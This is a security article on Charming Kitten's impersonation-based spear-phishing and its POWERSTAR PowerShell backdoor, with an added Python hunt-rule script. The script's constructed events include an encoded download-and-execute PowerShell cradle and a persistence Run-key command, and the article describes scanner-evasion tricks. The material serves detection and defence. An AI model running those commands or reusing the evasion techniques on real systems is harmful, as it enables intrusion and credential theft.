Charming Kitten, an Iran-based threat actor, has been observed by security researchers at Volexity using spear-phishing tradecraft built on patient impersonation to compromise the credentials and systems of its targets. The group’s main focus is intelligence collection, pursued through stolen credentials and spear-phishing emails.
In a recent spear-phishing campaign, Charming Kitten was found distributing an updated version of its PowerShell backdoor, known as POWERSTAR (also tracked as CharmPower). Volexity analysts examined the new variant and found that it relies on the InterPlanetary File System (IPFS) and publicly accessible cloud file hosting to retrieve its decryption routine and configuration details, rather than carrying them in the sample itself.
In the intrusion Volexity documented, Charming Kitten posed as a reporter for an Israeli media organisation. The attacker opened with casual conversation and only later offered the target a document on US foreign policy; building rapport before delivering a payload is a standard spear-phishing tactic because it lowers the recipient’s guard. After several days of otherwise legitimate exchanges, Charming Kitten sent a password-protected RAR archive containing a malicious LNK file disguised as a “draft report”. The password is not a courtesy to the recipient: mail gateways and sandboxes cannot open an encrypted archive, so the shortcut reaches the inbox unscanned.
Charming Kitten’s spear-phishing operations follow a recognisable sequence. The group first poses as a genuine person with a verifiable public profile and initiates contact with the target; the sender address imitates that person’s personal account so the recipient has no obvious reason for concern. Once the target responds, a follow-up email with a series of questions deepens the attacker-victim rapport. Whether the target then responds positively or goes quiet, the next step is the same: a malicious password-protected attachment. Confirming the sender through a channel other than email (a phone number or address already on file) is the simplest counter to this pattern.
POWERSTAR gives the operator remote execution of PowerShell and C# code, persistence through startup tasks and registry Run keys, and configuration settings that can be updated dynamically. It supports multiple command-and-control (C2) channels, including cloud file hosts, attacker-controlled servers, and IPFS-hosted files, so that blocking a single domain does not cut the operator off. The backdoor also collects system reconnaissance data and can check that previously established persistence mechanisms are still in place.
Volexity researchers obtained nine POWERSTAR modules. They provide functionality such as capturing screenshots, enumerating running processes, establishing persistence, gathering system information, crawling files, and performing cleanup. Charming Kitten has kept refining the malware to make detection harder; one example is fetching the decryption function from a remote file at runtime, so that the routine exists only in memory and never lands on disk where static scanning would find it.
Email-layer defences matter because the whole chain starts with a trusted-looking message. AI-assisted email security products can help detect impersonation, phishing, account takeover, business email compromise, and malware or ransomware delivery, and can flag tracking pixels and tampered messages. For this particular campaign, cheaper controls also apply: quarantine or block LNK attachments and password-protected archives at the gateway, enable PowerShell script block logging, and alert on new Run-key or scheduled-task entries that launch PowerShell on endpoints.
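The endpoint side of that advice, as an added example that is not part of the original article or of Volexity’s research: three hunt rules over Sysmon-style process-creation and registry-set events, covering a shortcut-launched PowerShell stager (the LNK stage), an encoded download cradle, and a Run-key value that relaunches PowerShell (the persistence the backdoor description mentions). The events, field names, paths and the cradle text are constructed for the example; they are not POWERSTAR indicators.

```python
"""Hunt rules for a shortcut-launched PowerShell backdoor that persists via
registry Run keys. All events below are CONSTRUCTED for this example; the
field names are an assumption rather than a vendor schema, and nothing here
is real POWERSTAR telemetry."""
import base64
import re

# A realistic -EncodedCommand payload is base64 over UTF-16LE text, so build
# one the way PowerShell expects it. The cradle text itself is illustrative.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, Sysmon-like shape
    {"type": "process_create", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED_CRADLE}"},
    {"type": "process_create", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\a\report.docx"'},
    {"type": "registry_set",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"powershell.exe -w hidden -c iex (gc $env:APPDATA\u.txt -raw)"},
    {"type": "registry_set",
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"type": "process_create", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

POWERSHELL = re.compile(r"(?i)(?:^|\\|\s)(?:powershell|pwsh)\.exe\b")
RUN_KEY = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")
# Switches that hide the console, skip the profile or bypass execution policy:
# typical for a stager started from a shortcut, rare for interactive use.
HIDDEN_OR_BYPASS = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|e(?:p|xecutionpolicy)\s+bypass)")
# "-e", "-ec", "-enc" and "-EncodedCommand" all take base64(UTF-16LE) script text.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")
# Script text or Run-key values that fetch and execute something.
CRADLE_HINT = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|frombase64string)\b")


def decode_encoded_command(cmdline):
    """Return the script behind -e/-enc/-EncodedCommand, or None if absent/malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated or damaged payload: the caller still sees the raw switch


def is_powershell(path):
    return bool(POWERSHELL.search(path))


def hunt(events):
    """Apply the three rules; return a list of (rule_name, detail) pairs."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create" and is_powershell(ev["image"]):
            cmd = ev["cmdline"]
            decoded = decode_encoded_command(cmd)
            # Rule 1: PowerShell spawned by explorer.exe (a double-clicked shortcut
            # or file) with the console hidden, the profile skipped or policy bypassed.
            if ev["parent"].lower().endswith("\\explorer.exe") and (
                    HIDDEN_OR_BYPASS.search(cmd) or decoded is not None):
                findings.append(("powershell_from_shortcut", decoded or cmd))
            # Rule 2: an encoded command carrying a download-and-execute cradle,
            # whatever the parent. (elif so one event is reported once.)
            elif decoded is not None and CRADLE_HINT.search(decoded):
                findings.append(("encoded_cradle", decoded))
        elif ev["type"] == "registry_set" and RUN_KEY.search(ev["key"]):
            # Rule 3: Run/RunOnce value that launches PowerShell or a cradle.
            if is_powershell(ev["value"]) or CRADLE_HINT.search(ev["value"]):
                findings.append(("run_key_powershell", ev["key"]))
    return findings


if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

On the constructed sample this reports the explorer-spawned hidden PowerShell (with the cradle decoded so an analyst sees the real command, not a base64 blob) and the Run-key value, while the OneDrive autorun and the svchost-launched `-File backup.ps1` job pass. That last one is deliberate: PowerShell started by the task scheduler is common in legitimate administration, so a production rule for the scheduled-task persistence mentioned above should key on task creation events and an allowlist of known scripts rather than on the launch alone.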
In conclusion, Charming Kitten, an Iran-based threat actor, continues to compromise the credentials and systems of its targets through patient, well-researched spear-phishing. Its recent campaign delivered an updated version of the POWERSTAR backdoor behind days of impersonation and a password-protected archive. By understanding the techniques and features employed by threat actors like Charming Kitten, organisations can better defend against spear-phishing and protect their sensitive information; layered email security, combined with attachment and endpoint controls, adds meaningful protection against these evolving threats.
